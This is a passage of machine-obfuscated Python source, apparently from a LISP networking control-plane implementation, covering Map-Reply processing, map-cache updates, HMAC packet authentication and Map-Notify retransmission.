ecm_port , O0ooOo0O0ooo0 , ooOOoo0 , IIi1iiIII11 )
if 21 - 21: ooOoO0o / iII111i % II111iiii * I1IiiI * II111iiii
return
if 40 - 40: Ii1I / i1IIi . iII111i
if 65 - 65: iIii1I11I1II1 * O0 . II111iiii * o0oOOo0O0Ooo . I1ii11iIi11i * I1IiiI
if 63 - 63: II111iiii . Oo0Ooo % iIii1I11I1II1
if 85 - 85: I1IiiI + i1IIi % I1Ii111
if 76 - 76: i11iIiiIii % i11iIiiIii
if ( lisp_i_am_mr and not ddt_request ) :
lisp_mr_process_map_request ( lisp_sockets , OoO , o0OOo0 ,
ecm_source , mr_port , mr_source )
if 33 - 33: OOooOOo . ooOoO0o / iIii1I11I1II1 * OOooOOo / oO0o
if 75 - 75: Ii1I - OoOoOO00 . OOooOOo - o0oOOo0O0Ooo - I1ii11iIi11i
if 69 - 69: O0 % I1ii11iIi11i
if 77 - 77: iIii1I11I1II1 . OOooOOo
if 64 - 64: OoOoOO00 - i1IIi * i1IIi / iII111i * OoOoOO00 * OoO0O00
if ( lisp_i_am_ddt or ddt_request ) :
packet = OoO
lisp_ddt_process_map_request ( lisp_sockets , o0OOo0 , ecm_source ,
ecm_port )
if 61 - 61: OOooOOo
return
if 51 - 51: Oo0Ooo * OOooOOo / iII111i
if 49 - 49: ooOoO0o . i1IIi % I1Ii111 . I1IiiI . I1ii11iIi11i + OoO0O00
if 65 - 65: I1ii11iIi11i + Ii1I / i11iIiiIii * I1Ii111 + OoooooooOO
if 7 - 7: Oo0Ooo % o0oOOo0O0Ooo
if 40 - 40: oO0o * IiII
if 29 - 29: O0 - II111iiii + iII111i
if 73 - 73: I1Ii111 - I11i + IiII - o0oOOo0O0Ooo - I11i - OOooOOo
if 40 - 40: iIii1I11I1II1 . iII111i * I1ii11iIi11i + IiII - iIii1I11I1II1
def lisp_store_mr_stats ( source , nonce ) :
I1I1iiii111II = lisp_get_map_resolver ( source , None )
if ( I1I1iiii111II == None ) : return
if 83 - 83: i1IIi
if 9 - 9: iIii1I11I1II1 + i11iIiiIii
if 70 - 70: I1IiiI - OoO0O00 % OOooOOo + ooOoO0o % II111iiii
if 19 - 19: I11i + i1IIi / i1IIi - II111iiii + I1Ii111
I1I1iiii111II . neg_map_replies_received += 1
I1I1iiii111II . last_reply = lisp_get_timestamp ( )
if 11 - 11: i11iIiiIii % i11iIiiIii / IiII - Oo0Ooo / O0 - I11i
if 29 - 29: OOooOOo * iIii1I11I1II1 * ooOoO0o
if 80 - 80: oO0o * I1Ii111
if 87 - 87: iII111i + OoOoOO00 % ooOoO0o - oO0o
if ( ( I1I1iiii111II . neg_map_replies_received % 100 ) == 0 ) : I1I1iiii111II . total_rtt = 0
if 40 - 40: i1IIi / OoOoOO00 - I11i / ooOoO0o . Ii1I
if 8 - 8: I1IiiI . IiII . OOooOOo . O0
if 3 - 3: Ii1I + i11iIiiIii
if 87 - 87: ooOoO0o - iII111i % I11i
if ( I1I1iiii111II . last_nonce == nonce ) :
I1I1iiii111II . total_rtt += ( time . time ( ) - I1I1iiii111II . last_used )
I1I1iiii111II . last_nonce = 0
if 88 - 88: I11i . OoooooooOO
if ( ( I1I1iiii111II . neg_map_replies_received % 10 ) == 0 ) : I1I1iiii111II . last_nonce = 0
return
if 86 - 86: Ii1I - I1IiiI - iII111i % Ii1I . I1ii11iIi11i % i1IIi
if 84 - 84: OoOoOO00
if 99 - 99: OoO0O00 - OoOoOO00 - i1IIi / OoO0O00 * I1ii11iIi11i * iIii1I11I1II1
if 65 - 65: iII111i - O0 / i1IIi . I1Ii111
if 85 - 85: o0oOOo0O0Ooo % Ii1I
if 81 - 81: oO0o / OoO0O00 * i1IIi % iIii1I11I1II1
if 23 - 23: II111iiii . II111iiii
def lisp_process_map_reply ( lisp_sockets , packet , source , ttl , itr_in_ts ) :
global lisp_map_cache
if 17 - 17: i11iIiiIii / IiII * I1IiiI . Oo0Ooo / o0oOOo0O0Ooo - iIii1I11I1II1
oO00OoO0O0O = lisp_map_reply ( )
packet = oO00OoO0O0O . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Reply packet" )
return
if 21 - 21: OOooOOo % Ii1I
oO00OoO0O0O . print_map_reply ( )
if 3 - 3: OOooOOo / ooOoO0o / I1Ii111 . I11i
if 54 - 54: I1ii11iIi11i - I1IiiI . OoOoOO00
if 36 - 36: OoO0O00 * I1IiiI / iII111i
if 95 - 95: Ii1I . Oo0Ooo
I1ooO00000OOoO = None
for IiIIi1IiiIiI in range ( oO00OoO0O0O . record_count ) :
i111iII = lisp_eid_record ( )
packet = i111iII . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode EID-record in Map-Reply packet" )
return
if 50 - 50: II111iiii * OoOoOO00 . ooOoO0o - I1Ii111 . OoOoOO00
i111iII . print_record ( " " , False )
if 64 - 64: iII111i + I1ii11iIi11i
if 88 - 88: I1Ii111 / i11iIiiIii - O0 . II111iiii / II111iiii * II111iiii
if 56 - 56: Oo0Ooo / I1IiiI % I1Ii111 % I1ii11iIi11i * I1IiiI - IiII
if 39 - 39: oO0o + iII111i . I1Ii111 * i11iIiiIii % o0oOOo0O0Ooo + OOooOOo
if 61 - 61: ooOoO0o / I1Ii111 / I1ii11iIi11i - Ii1I % o0oOOo0O0Ooo * iII111i
if ( i111iII . rloc_count == 0 ) :
lisp_store_mr_stats ( source , oO00OoO0O0O . nonce )
if 94 - 94: I1IiiI / I11i
if 100 - 100: Ii1I % OoO0O00 % OoooooooOO / II111iiii * I1Ii111
o0oO0O00 = ( i111iII . group . is_null ( ) == False )
if 64 - 64: I1Ii111 * OOooOOo * Ii1I + I1ii11iIi11i / iIii1I11I1II1 / Oo0Ooo
if 50 - 50: OOooOOo % i11iIiiIii
if 99 - 99: IiII
if 87 - 87: IiII
if 35 - 35: oO0o . O0 . Ii1I / ooOoO0o
if ( lisp_decent_push_configured ) :
I11I1iI = i111iII . action
if ( o0oO0O00 and I11I1iI == LISP_DROP_ACTION ) :
if ( i111iII . eid . is_local ( ) ) : continue
if 36 - 36: i11iIiiIii . II111iiii . I11i . II111iiii
if 36 - 36: Ii1I + ooOoO0o / Oo0Ooo % Oo0Ooo
if 2 - 2: oO0o - Oo0Ooo * OoO0O00 . ooOoO0o . OOooOOo - oO0o
if 74 - 74: o0oOOo0O0Ooo
if 18 - 18: Oo0Ooo % OOooOOo / OOooOOo . I1IiiI + i1IIi . I1IiiI
if 3 - 3: O0 * O0 + II111iiii + OoOoOO00 * I11i % Oo0Ooo
if 19 - 19: oO0o % IiII % OoooooooOO % I1ii11iIi11i / OoO0O00
if ( o0oO0O00 == False and i111iII . eid . is_null ( ) ) : continue
if 6 - 6: O0 * I1Ii111 - II111iiii
if 60 - 60: oO0o % oO0o
if 76 - 76: I1Ii111 / o0oOOo0O0Ooo
if 19 - 19: O0 . i1IIi % iIii1I11I1II1 + OOooOOo * OoOoOO00 / I11i
if 82 - 82: I1ii11iIi11i
if ( o0oO0O00 ) :
o0o000Oo = lisp_map_cache_lookup ( i111iII . eid , i111iII . group )
else :
o0o000Oo = lisp_map_cache . lookup_cache ( i111iII . eid , True )
if 89 - 89: I1IiiI / o0oOOo0O0Ooo % i1IIi * ooOoO0o
O00Oo = ( o0o000Oo == None )
if 96 - 96: OOooOOo + OoOoOO00 % IiII % i1IIi + o0oOOo0O0Ooo
if 33 - 33: iIii1I11I1II1 . O0
if 54 - 54: iIii1I11I1II1
if 54 - 54: iII111i + OOooOOo + OoO0O00
if 6 - 6: oO0o - OoooooooOO * iIii1I11I1II1 * I1ii11iIi11i
if ( o0o000Oo == None ) :
o0O0o0O , O0O , IIIi1i1iIIIi = lisp_allow_gleaning ( i111iII . eid , i111iII . group ,
None )
if ( o0O0o0O ) : continue
else :
if ( o0o000Oo . gleaned ) : continue
if 86 - 86: oO0o . iII111i
if 44 - 44: I11i % iII111i - i11iIiiIii + II111iiii / OoO0O00
if 97 - 97: II111iiii * OoOoOO00 + I1Ii111 * ooOoO0o . I11i * OOooOOo
if 36 - 36: II111iiii / Ii1I - IiII % iII111i / Oo0Ooo . oO0o
if 50 - 50: I11i / I1IiiI / OOooOOo + I1Ii111 + OOooOOo * i1IIi
OoO0oOOooOO = [ ]
Oo0O00000o0OO = None
for OO00O0O in range ( i111iII . rloc_count ) :
I1Ii11iI = lisp_rloc_record ( )
I1Ii11iI . keys = oO00OoO0O0O . keys
packet = I1Ii11iI . decode ( packet , oO00OoO0O0O . nonce )
if ( packet == None ) :
lprint ( "Could not decode RLOC-record in Map-Reply packet" )
return
if 100 - 100: I11i * OoO0O00 - i1IIi + iII111i * Ii1I - OoooooooOO
I1Ii11iI . print_record ( " " )
if 47 - 47: o0oOOo0O0Ooo / Ii1I - iII111i * OOooOOo / i11iIiiIii
OoOO0O = None
if ( o0o000Oo ) : OoOO0O = o0o000Oo . get_rloc ( I1Ii11iI . rloc )
if ( OoOO0O ) :
I1IIiIIIii = OoOO0O
else :
I1IIiIIIii = lisp_rloc ( )
if 53 - 53: OoOoOO00
if 43 - 43: I1ii11iIi11i * Oo0Ooo
if 95 - 95: IiII + iII111i % I1IiiI
if 18 - 18: Oo0Ooo
if 8 - 8: O0 + iIii1I11I1II1 - O0
if 67 - 67: O0
if 22 - 22: I11i / i1IIi . II111iiii % ooOoO0o / I11i - Ii1I
Oo0O00O = I1IIiIIIii . store_rloc_from_record ( I1Ii11iI , oO00OoO0O0O . nonce ,
source )
I1IIiIIIii . echo_nonce_capable = oO00OoO0O0O . echo_nonce_capable
if 28 - 28: O0 - Oo0Ooo
if ( I1IIiIIIii . echo_nonce_capable ) :
oo0o00OO = I1IIiIIIii . rloc . print_address_no_iid ( )
if ( lisp_get_echo_nonce ( None , oo0o00OO ) == None ) :
lisp_echo_nonce ( oo0o00OO )
if 58 - 58: iIii1I11I1II1 - OoooooooOO - iII111i
if 43 - 43: ooOoO0o / o0oOOo0O0Ooo
if 56 - 56: II111iiii * I1ii11iIi11i * O0 . iII111i . I1ii11iIi11i % I1Ii111
if 99 - 99: Oo0Ooo - OoO0O00 + OoooooooOO - I1Ii111 - I1ii11iIi11i % i1IIi
if 49 - 49: IiII % OoooooooOO / Oo0Ooo - OoOoOO00 + o0oOOo0O0Ooo / Ii1I
if 6 - 6: I11i % IiII
if ( I1IIiIIIii . json ) :
if ( lisp_is_json_telemetry ( I1IIiIIIii . json . json_string ) ) :
iii1Iii1 = I1IIiIIIii . json . json_string
iii1Iii1 = lisp_encode_telemetry ( iii1Iii1 , ii = itr_in_ts )
I1IIiIIIii . json . json_string = iii1Iii1
if 48 - 48: Ii1I
if 100 - 100: OoO0O00 % I1Ii111 + OoooooooOO / OoO0O00
if 62 - 62: IiII
if 66 - 66: o0oOOo0O0Ooo % OOooOOo
if 15 - 15: Ii1I % IiII + IiII % iII111i - O0 * OoooooooOO
if 53 - 53: OoOoOO00 . Ii1I / Oo0Ooo
if 62 - 62: i11iIiiIii
if 38 - 38: I1ii11iIi11i % ooOoO0o * OoooooooOO + iIii1I11I1II1 % i1IIi / OOooOOo
if 6 - 6: i11iIiiIii
if 8 - 8: iIii1I11I1II1 + I1ii11iIi11i . i1IIi % OoOoOO00 % OoooooooOO * Oo0Ooo
if ( oO00OoO0O0O . rloc_probe and I1Ii11iI . probe_bit ) :
if ( I1IIiIIIii . rloc . afi == source . afi ) :
lisp_process_rloc_probe_reply ( I1IIiIIIii , source , Oo0O00O ,
oO00OoO0O0O , ttl , Oo0O00000o0OO )
if 53 - 53: oO0o
if ( I1IIiIIIii . rloc . is_multicast_address ( ) ) : Oo0O00000o0OO = I1IIiIIIii
if 23 - 23: I1ii11iIi11i . I1Ii111 + OOooOOo
if 4 - 4: I1IiiI
if 31 - 31: ooOoO0o * i1IIi . O0
if 5 - 5: OOooOOo . I1ii11iIi11i + ooOoO0o . ooOoO0o + iII111i
if 100 - 100: I1Ii111
OoO0oOOooOO . append ( I1IIiIIIii )
if 71 - 71: ooOoO0o * i1IIi / OoOoOO00 * i11iIiiIii - iII111i
if 88 - 88: IiII
if 29 - 29: iII111i . ooOoO0o
if 62 - 62: IiII
if ( lisp_data_plane_security and I1IIiIIIii . rloc_recent_rekey ( ) ) :
I1ooO00000OOoO = I1IIiIIIii
if 95 - 95: ooOoO0o / i1IIi + II111iiii + OoO0O00 % OoO0O00
if 18 - 18: ooOoO0o * I1IiiI / iII111i % iII111i
if 9 - 9: i11iIiiIii % ooOoO0o % O0 + i1IIi / O0
if 12 - 12: I1Ii111 - iII111i * iII111i + OoO0O00 . Ii1I % I11i
if 28 - 28: ooOoO0o % OoO0O00 - II111iiii * IiII - I1IiiI + I1IiiI
if 84 - 84: IiII / Ii1I
if 39 - 39: OOooOOo - iIii1I11I1II1 + OoOoOO00 % IiII * OoooooooOO % Ii1I
if 11 - 11: I1ii11iIi11i
if 83 - 83: O0
if 97 - 97: O0
if 50 - 50: I1Ii111 / OoooooooOO . o0oOOo0O0Ooo + I1IiiI * i11iIiiIii
if ( oO00OoO0O0O . rloc_probe == False and lisp_nat_traversal ) :
iioo00oOOO00 = [ ]
i1ii1iiI1iI1 = [ ]
for I1IIiIIIii in OoO0oOOooOO :
if 85 - 85: iII111i
if 23 - 23: ooOoO0o - OoO0O00 * oO0o / i11iIiiIii * iIii1I11I1II1
if 7 - 7: iIii1I11I1II1 - I1Ii111 . ooOoO0o . O0 - OOooOOo
if 5 - 5: i1IIi * OoOoOO00 + i1IIi % I11i
if 79 - 79: OOooOOo % iIii1I11I1II1 / OoOoOO00
if ( I1IIiIIIii . rloc . is_private_address ( ) ) :
I1IIiIIIii . priority = 1
I1IIiIIIii . state = LISP_RLOC_UNREACH_STATE
iioo00oOOO00 . append ( I1IIiIIIii )
i1ii1iiI1iI1 . append ( I1IIiIIIii . rloc . print_address_no_iid ( ) )
continue
if 9 - 9: Ii1I
if 44 - 44: iII111i
if 46 - 46: I11i . i11iIiiIii * OoOoOO00 + o0oOOo0O0Ooo / ooOoO0o
if 37 - 37: OoO0O00 - Ii1I + OoO0O00
if 49 - 49: OoooooooOO - I1ii11iIi11i % I1ii11iIi11i / i1IIi . ooOoO0o
if 60 - 60: Oo0Ooo
if ( I1IIiIIIii . priority == 254 and lisp_i_am_rtr == False ) :
iioo00oOOO00 . append ( I1IIiIIIii )
i1ii1iiI1iI1 . append ( I1IIiIIIii . rloc . print_address_no_iid ( ) )
if 46 - 46: OoOoOO00 + i1IIi
if ( I1IIiIIIii . priority != 254 and lisp_i_am_rtr ) :
iioo00oOOO00 . append ( I1IIiIIIii )
i1ii1iiI1iI1 . append ( I1IIiIIIii . rloc . print_address_no_iid ( ) )
if 43 - 43: II111iiii * IiII % iIii1I11I1II1 % i11iIiiIii % I1ii11iIi11i
if 81 - 81: oO0o % I1ii11iIi11i % ooOoO0o * O0 - OOooOOo
if 17 - 17: O0 % O0 / I1ii11iIi11i . Oo0Ooo . iII111i
if ( i1ii1iiI1iI1 != [ ] ) :
OoO0oOOooOO = iioo00oOOO00
lprint ( "NAT-traversal optimized RLOC-set: {}" . format ( i1ii1iiI1iI1 ) )
if 4 - 4: OoO0O00
if 65 - 65: Oo0Ooo % O0 / I1Ii111 * IiII - oO0o
if 32 - 32: Ii1I * OoO0O00 + ooOoO0o
if 41 - 41: IiII + I11i * ooOoO0o + Oo0Ooo . ooOoO0o
if 38 - 38: iII111i * OoooooooOO - IiII
if 36 - 36: I1Ii111 * II111iiii + I1ii11iIi11i - iII111i * iII111i
if 91 - 91: O0 + I1Ii111 * II111iiii - O0 . i11iIiiIii . Oo0Ooo
iioo00oOOO00 = [ ]
for I1IIiIIIii in OoO0oOOooOO :
if ( I1IIiIIIii . json != None ) : continue
iioo00oOOO00 . append ( I1IIiIIIii )
if 54 - 54: ooOoO0o * I11i / I1ii11iIi11i % ooOoO0o
if ( iioo00oOOO00 != [ ] ) :
I1I1 = len ( OoO0oOOooOO ) - len ( iioo00oOOO00 )
lprint ( "Pruning {} no-address RLOC-records for map-cache" . format ( I1I1 ) )
if 76 - 76: I11i . I1IiiI
OoO0oOOooOO = iioo00oOOO00
if 66 - 66: oO0o % oO0o * IiII
if 39 - 39: i1IIi * Ii1I + OoOoOO00 / oO0o
if 6 - 6: I1ii11iIi11i / II111iiii / OoOoOO00 . i11iIiiIii - iII111i
if 43 - 43: i11iIiiIii * i11iIiiIii * I1Ii111
if 80 - 80: oO0o . I1IiiI * II111iiii + o0oOOo0O0Ooo / o0oOOo0O0Ooo % OoooooooOO
if 31 - 31: o0oOOo0O0Ooo - OoO0O00 % I1IiiI
if 23 - 23: OOooOOo
if 97 - 97: Oo0Ooo / OoooooooOO . OoooooooOO
if ( oO00OoO0O0O . rloc_probe and o0o000Oo != None ) : OoO0oOOooOO = o0o000Oo . rloc_set
if 47 - 47: OoO0O00
if 52 - 52: I1IiiI * iIii1I11I1II1 % oO0o * IiII % oO0o
if 9 - 9: I11i
if 83 - 83: i11iIiiIii
if 72 - 72: oO0o + II111iiii . O0 * oO0o + iII111i
I1i1I1I = O00Oo
if ( o0o000Oo and OoO0oOOooOO != o0o000Oo . rloc_set ) :
o0o000Oo . delete_rlocs_from_rloc_probe_list ( )
I1i1I1I = True
if 45 - 45: i1IIi * OoooooooOO - IiII + oO0o
if 38 - 38: OoO0O00
if 42 - 42: O0
if 31 - 31: OoOoOO00 . II111iiii - oO0o . iII111i - I1ii11iIi11i
if 90 - 90: OoooooooOO / ooOoO0o / I1IiiI
o0o00 = o0o000Oo . uptime if ( o0o000Oo ) else None
if ( o0o000Oo == None ) :
o0o000Oo = lisp_mapping ( i111iII . eid , i111iII . group , OoO0oOOooOO )
o0o000Oo . mapping_source = source
if 28 - 28: iIii1I11I1II1 - o0oOOo0O0Ooo . iIii1I11I1II1 / I11i / I1Ii111 % iIii1I11I1II1
if 45 - 45: OoO0O00 + ooOoO0o / iIii1I11I1II1 % i11iIiiIii
if 16 - 16: i1IIi / oO0o - OOooOOo / Ii1I + I1IiiI
if 62 - 62: i11iIiiIii . Ii1I . iII111i / I1Ii111 * OoO0O00
if 31 - 31: OoOoOO00
if 16 - 16: OoooooooOO
if ( lisp_i_am_rtr and i111iII . group . is_null ( ) == False ) :
o0o000Oo . map_cache_ttl = LISP_MCAST_TTL
else :
o0o000Oo . map_cache_ttl = i111iII . store_ttl ( )
if 32 - 32: ooOoO0o - o0oOOo0O0Ooo / ooOoO0o + o0oOOo0O0Ooo + iII111i
o0o000Oo . action = i111iII . action
o0o000Oo . add_cache ( I1i1I1I )
if 78 - 78: OoooooooOO . I1ii11iIi11i * oO0o . o0oOOo0O0Ooo * OoOoOO00 / oO0o
if 47 - 47: OOooOOo
iI1I11II = "Add"
if ( o0o00 ) :
o0o000Oo . uptime = o0o00
o0o000Oo . refresh_time = lisp_get_timestamp ( )
iI1I11II = "Replace"
if 99 - 99: O0 - OoO0O00
if 95 - 95: Ii1I . IiII * o0oOOo0O0Ooo
lprint ( "{} {} map-cache with {} RLOCs" . format ( iI1I11II ,
green ( o0o000Oo . print_eid_tuple ( ) , False ) , len ( OoO0oOOooOO ) ) )
if 91 - 91: I1Ii111
if 49 - 49: I11i
if 17 - 17: Oo0Ooo % o0oOOo0O0Ooo
if 3 - 3: OoO0O00 . oO0o . oO0o . Ii1I
if 100 - 100: i11iIiiIii / i1IIi . I1ii11iIi11i
if ( lisp_ipc_dp_socket and I1ooO00000OOoO != None ) :
lisp_write_ipc_keys ( I1ooO00000OOoO )
if 1 - 1: IiII * I1Ii111 / I1ii11iIi11i * i11iIiiIii
if 82 - 82: o0oOOo0O0Ooo * OoO0O00 / o0oOOo0O0Ooo % OoOoOO00 * iIii1I11I1II1 % O0
if 10 - 10: ooOoO0o
if 69 - 69: I11i + I1IiiI / oO0o
if 89 - 89: i1IIi % OoOoOO00 . I1ii11iIi11i
if 85 - 85: I1Ii111 - oO0o
if 34 - 34: iIii1I11I1II1 / IiII + OoOoOO00 - IiII / ooOoO0o + OoOoOO00
if ( O00Oo ) :
oO0oo000O = bold ( "RLOC-probe" , False )
for I1IIiIIIii in o0o000Oo . best_rloc_set :
oo0o00OO = red ( I1IIiIIIii . rloc . print_address_no_iid ( ) , False )
lprint ( "Trigger {} to {}" . format ( oO0oo000O , oo0o00OO ) )
lisp_send_map_request ( lisp_sockets , 0 , o0o000Oo . eid , o0o000Oo . group , I1IIiIIIii )
if 14 - 14: ooOoO0o - OoooooooOO / iIii1I11I1II1
if 98 - 98: i1IIi
if 81 - 81: OoOoOO00 * i11iIiiIii + I1IiiI
return
if 2 - 2: I11i - IiII + I1IiiI % OoO0O00 + iIii1I11I1II1 + oO0o
if 49 - 49: I1IiiI * I1Ii111 . I1IiiI - II111iiii
if 57 - 57: oO0o + O0 - OoOoOO00
if 14 - 14: II111iiii + i11iIiiIii + Ii1I / o0oOOo0O0Ooo . OoO0O00
if 93 - 93: o0oOOo0O0Ooo + i1IIi
if 24 - 24: i1IIi
if 54 - 54: iIii1I11I1II1 - IiII + o0oOOo0O0Ooo + I1ii11iIi11i + IiII
if 99 - 99: Oo0Ooo
def lisp_compute_auth ( packet , map_register , password ) :
if ( map_register . alg_id == LISP_NONE_ALG_ID ) : return ( packet )
if 38 - 38: I1ii11iIi11i - I1IiiI
packet = map_register . zero_auth ( packet )
IIi1iiIIi1i = lisp_hash_me ( packet , map_register . alg_id , password , False )
if 50 - 50: iII111i % OoO0O00 - oO0o + Oo0Ooo . O0 . iII111i
if 42 - 42: iII111i + I1ii11iIi11i
if 44 - 44: I1ii11iIi11i % IiII
if 1 - 1: Oo0Ooo + IiII - I1Ii111 / I1Ii111
map_register . auth_data = IIi1iiIIi1i
packet = map_register . encode_auth ( packet )
return ( packet )
if 25 - 25: OoOoOO00
if 52 - 52: OOooOOo + IiII
if 73 - 73: OoooooooOO - I1Ii111 % iII111i / OOooOOo . o0oOOo0O0Ooo - IiII
if 69 - 69: Ii1I . iIii1I11I1II1 / Oo0Ooo * Oo0Ooo % IiII
if 5 - 5: OOooOOo - I1Ii111 + IiII
if 82 - 82: OOooOOo
if 26 - 26: ooOoO0o + OoooooooOO + ooOoO0o * I1Ii111
def lisp_hash_me ( packet , alg_id , password , do_hex ) :
if ( alg_id == LISP_NONE_ALG_ID ) : return ( True )
if 26 - 26: I1IiiI - OOooOOo
if ( alg_id == LISP_SHA_1_96_ALG_ID ) :
I1iiiII1i1 = hashlib . sha1
if 2 - 2: IiII % iII111i / o0oOOo0O0Ooo * I11i
if ( alg_id == LISP_SHA_256_128_ALG_ID ) :
I1iiiII1i1 = hashlib . sha256
if 35 - 35: OoOoOO00 * I1Ii111 / II111iiii / O0
if 35 - 35: ooOoO0o * I11i
if ( do_hex ) :
IIi1iiIIi1i = hmac . new ( password , packet , I1iiiII1i1 ) . hexdigest ( )
else :
IIi1iiIIi1i = hmac . new ( password , packet , I1iiiII1i1 ) . digest ( )
if 85 - 85: i1IIi
return ( IIi1iiIIi1i )
if 81 - 81: I1Ii111
if 28 - 28: i1IIi * ooOoO0o
if 14 - 14: II111iiii + II111iiii - I11i / I11i . OoOoOO00 + OoO0O00
if 92 - 92: II111iiii - II111iiii % IiII
if 48 - 48: oO0o / II111iiii + oO0o
if 16 - 16: o0oOOo0O0Ooo % II111iiii - i11iIiiIii - IiII + O0 - i11iIiiIii
if 58 - 58: OoooooooOO / I1ii11iIi11i - Oo0Ooo / II111iiii
if 13 - 13: o0oOOo0O0Ooo + OoOoOO00 * ooOoO0o % IiII
def lisp_verify_auth ( packet , alg_id , auth_data , password ) :
if ( alg_id == LISP_NONE_ALG_ID ) : return ( True )
if 18 - 18: I1IiiI . I1ii11iIi11i + Oo0Ooo - iII111i
IIi1iiIIi1i = lisp_hash_me ( packet , alg_id , password , True )
o00Oo = ( IIi1iiIIi1i == auth_data )
if 15 - 15: I1Ii111 / I11i / i11iIiiIii + OoO0O00 % OOooOOo
if 8 - 8: oO0o - I1IiiI / I11i + II111iiii - I1IiiI
if 3 - 3: I11i * o0oOOo0O0Ooo . O0
if 11 - 11: Oo0Ooo
if ( o00Oo == False ) :
lprint ( "Hashed value: {} does not match packet value: {}" . format ( IIi1iiIIi1i , auth_data ) )
if 64 - 64: OOooOOo
if 8 - 8: ooOoO0o % o0oOOo0O0Ooo
return ( o00Oo )
if 22 - 22: O0 * IiII . OoO0O00
if 63 - 63: oO0o % Oo0Ooo * OoO0O00 / II111iiii / Ii1I - ooOoO0o
if 14 - 14: ooOoO0o . o0oOOo0O0Ooo + II111iiii
if 50 - 50: Ii1I - i1IIi * oO0o
if 52 - 52: I11i / oO0o - oO0o
if 84 - 84: iIii1I11I1II1 - o0oOOo0O0Ooo
if 37 - 37: iII111i * o0oOOo0O0Ooo
def lisp_retransmit_map_notify ( map_notify ) :
oo0OoO = map_notify . etr
Oo0O00O = map_notify . etr_port
if 23 - 23: ooOoO0o + OoooooooOO * iII111i . I11i
if 2 - 2: iIii1I11I1II1 * I1ii11iIi11i - OoooooooOO
if 93 - 93: iII111i % ooOoO0o * Oo0Ooo
if 34 - 34: O0 * oO0o
if 58 - 58: OOooOOo . iII111i - Oo0Ooo / iII111i . I11i
if ( map_notify . retry_count == LISP_MAX_MAP_NOTIFY_RETRIES ) :
lprint ( "Map-Notify with nonce 0x{} retry limit reached for ETR {}" . format ( map_notify . nonce_key , red ( oo0OoO . print_address ( ) , False ) ) )
if 86 - 86: iIii1I11I1II1 - iII111i % Ii1I
if 18 - 18: oO0o / IiII - OOooOOo % Ii1I
Oo000O000 = map_notify . nonce_key
if ( lisp_map_notify_queue . has_key ( Oo000O000 ) ) :
map_notify . retransmit_timer . cancel ( )
lprint ( "Dequeue Map-Notify from retransmit queue, key is: {}" . format ( Oo000O000 ) )
if 88 - 88: i11iIiiIii
try :
lisp_map_notify_queue . pop ( Oo000O000 )
except :
lprint ( "Key not found in Map-Notify queue" )
if 13 - 13: I1IiiI
if 52 - 52: Ii1I * oO0o / I1Ii111 . IiII
return
if 84 - 84: OoooooooOO - oO0o - I1Ii111
if 69 - 69: OoOoOO00 * Ii1I % OoooooooOO % OOooOOo * OoOoOO00
IiIiI = map_notify . lisp_sockets
map_notify . retry_count += 1
if 20 - 20: IiII
lprint ( "Retransmit {} with nonce 0x{} to xTR {}, retry {}" . format ( bold ( "Map-Notify" , False ) , map_notify . nonce_key ,
# II111iiii
red ( oo0OoO . print_address ( ) , False ) , map_notify . retry_count ) )
if 80 - 80: OOooOOo . OoO0O00 + O0 / IiII
lisp_send_map_notify ( IiIiI , map_notify . packet , oo0OoO , Oo0O00O )
if ( map_notify . site ) : map_notify . site . map_notifies_sent += 1
if 30 - 30: Ii1I / I11i . II111iiii + ooOoO0o
if 58 - 58: Oo0Ooo % OOooOOo - i11iIiiIii - I1Ii111 - Ii1I % OoO0O00
if 67 - 67: I1Ii111 + OoO0O00 - oO0o / OOooOOo . OoooooooOO * O0
if 91 - 91: O0 * OoOoOO00 - OoOoOO00 * II111iiii - iII111i
map_notify . retransmit_timer = threading . Timer ( LISP_MAP_NOTIFY_INTERVAL ,
lisp_retransmit_map_notify , [ map_notify ] )
map_notify . retransmit_timer . start ( )
return
if 38 - 38: oO0o * I11i % OOooOOo
if 80 - 80: O0 % II111iiii / O0 . Oo0Ooo * OoOoOO00 + OOooOOo
if 47 - 47: Ii1I - Oo0Ooo * OoOoOO00
if 20 - 20: oO0o
if 48 - 48: I1IiiI % OoO0O00
if 33 - 33: Ii1I
if 73 - 73: Ii1I . IiII
def lisp_send_merged_map_notify ( lisp_sockets , parent , map_register ,
eid_record ) :
if 43 - 43: I11i . IiII - iII111i * I1IiiI * iII111i
if 90 - 90: i11iIiiIii * i1IIi
if 88 - 88: i11iIiiIii - OoOoOO00
if 53 - 53: iIii1I11I1II1 % I1Ii111 / Oo0Ooo % Oo0Ooo
eid_record . rloc_count = len ( parent . registered_rlocs )
iIiIi1IiiiI1 = eid_record . encode ( )
eid_record . print_record ( "Merged Map-Notify " , False )
if 64 - 64: OoO0O00 + I1ii11iIi11i / OoO0O00 * I1Ii111 . Oo0Ooo
if 5 - 5: iII111i - iIii1I11I1II1 * IiII
if 52 - 52: OOooOOo
if 50 - 50: OoOoOO00 % o0oOOo0O0Ooo - II111iiii - i1IIi
for iI11IiI1 in parent . registered_rlocs :
I1Ii11iI = lisp_rloc_record ( )
I1Ii11iI . store_rloc_entry ( iI11IiI1 )
iIiIi1IiiiI1 += I1Ii11iI . encode ( )
I1Ii11iI . print_record ( " " )
del ( I1Ii11iI )
if 24 - 24: I1ii11iIi11i * IiII + iII111i / Oo0Ooo - ooOoO0o . IiII
if 81 - 81: OoooooooOO + OOooOOo
if 7 - 7: I11i + ooOoO0o
if 28 - 28: OoooooooOO * iII111i / oO0o / iII111i
if 80 - 80: OoO0O00 - I1IiiI + OOooOOo - iII111i / i1IIi
for iI11IiI1 in parent . registered_rlocs :
oo0OoO = iI11IiI1 . rloc
Ii1ii1 = lisp_map_notify ( lisp_sockets )
Ii1ii1 . record_count = 1
I1I1I1 = map_register . key_id
Ii1ii1 . key_id = I1I1I1
Ii1ii1 . alg_id = map_register . alg_id
Ii1ii1 . auth_len = map_register . auth_len
Ii1ii1 . nonce = map_register . nonce
Ii1ii1 . nonce_key = lisp_hex_string ( Ii1ii1 . nonce )
Ii1ii1 . etr . copy_address ( oo0OoO )
Ii1ii1 . etr_port = map_register . sport
Ii1ii1 . site = parent . site
IiiiIi1iiii11 = Ii1ii1 . encode ( iIiIi1IiiiI1 , parent . site . auth_key [ I1I1I1 ] )
Ii1ii1 . print_notify ( )
if 83 - 83: iIii1I11I1II1
if 73 - 73: I1ii11iIi11i + II111iiii . i11iIiiIii + I1IiiI + I1ii11iIi11i
if 6 - 6: O0 % Ii1I . oO0o
